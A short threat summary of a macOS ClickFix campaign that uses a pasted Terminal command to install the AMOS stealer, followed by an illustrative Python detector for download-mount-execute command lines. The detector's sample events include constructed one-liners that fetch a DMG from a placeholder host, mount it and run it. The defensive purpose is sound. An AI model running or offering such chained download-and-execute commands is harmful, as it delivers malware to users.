A macOS-targeting campaign reported by Palo Alto Networks Unit 42 uses ClickFix-style social engineering to deliver the Atomic macOS Stealer (AMOS) via a Terminal command that automates DMG download, mount, and execution. The malware harvests credentials from 14 or more browsers, cryptocurrency wallets, and macOS Keychain, and replaces Ledger Live and Trezor Suite with trojanized versions for persistent crypto theft. No CVE applies; the attack depends entirely on user execution of a pasted Terminal command.
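A detection sketch for the download, mount and execute chain described above, as an added example that is not taken from the Unit 42 report. It assumes process command lines are available from an EDR or log export; the tool names matched (`curl`, `wget`, `hdiutil`, `open`, shells) and every sample event are assumptions constructed for illustration, since the page does not show the actual command.

```python
import re
import shlex

# Constructed sample events (pid, command line); none come from the report.
SAMPLE_EVENTS = [
    (101, "curl -fsSL https://example.invalid/app.dmg -o /tmp/app.dmg && "
          "hdiutil attach -nobrowse /tmp/app.dmg && /Volumes/App/App.app/Contents/MacOS/App"),
    (102, "hdiutil attach ~/Downloads/Xcode.dmg"),
    (103, "curl -O https://example.invalid/notes.txt"),
    (104, "curl -L -o /tmp/tool.dmg https://example.invalid/tool.dmg; hdiutil attach /tmp/tool.dmg"),
    (105, "open /Volumes/Installer/Installer.app"),
]

# Shell operators that chain several commands into one pasted line.
SEPARATORS = re.compile(r"&&|\|\||;|\|")

def stages(cmdline):
    """Return which of the stages download/mount/execute one command line contains."""
    found = set()
    for segment in SEPARATORS.split(cmdline):
        try:
            words = shlex.split(segment)
        except ValueError:          # unbalanced quotes: fall back to naive split
            words = segment.split()
        if not words:
            continue
        tool, args = words[0].rsplit("/", 1)[-1], words[1:]
        if tool in ("curl", "wget") and any(".dmg" in a.lower() for a in args):
            found.add("download")   # fetches a disk image
        elif tool == "hdiutil" and args and args[0] in ("attach", "mount"):
            found.add("mount")      # mounts a disk image
        elif words[0].startswith("/Volumes/"):
            found.add("execute")    # runs a binary directly from a mounted volume
        elif tool in ("open", "sh", "bash", "zsh") and any(a.startswith("/Volumes/") for a in args):
            found.add("execute")    # launches something from a mounted volume
    return found

def triage(events):
    """All three stages in one line -> alert; two -> review; fewer -> ignored."""
    verdicts = {3: "alert", 2: "review"}
    results = []
    for pid, cmdline in events:
        count = len(stages(cmdline))
        if count in verdicts:
            results.append((pid, verdicts[count]))
    return results

if __name__ == "__main__":
    for pid, verdict in triage(SAMPLE_EVENTS):
        print(pid, verdict)
```

Ordinary manual installs (events 102 and 105) stay below the threshold because they contain only one stage; the signal is the chaining of all stages in a single pasted line.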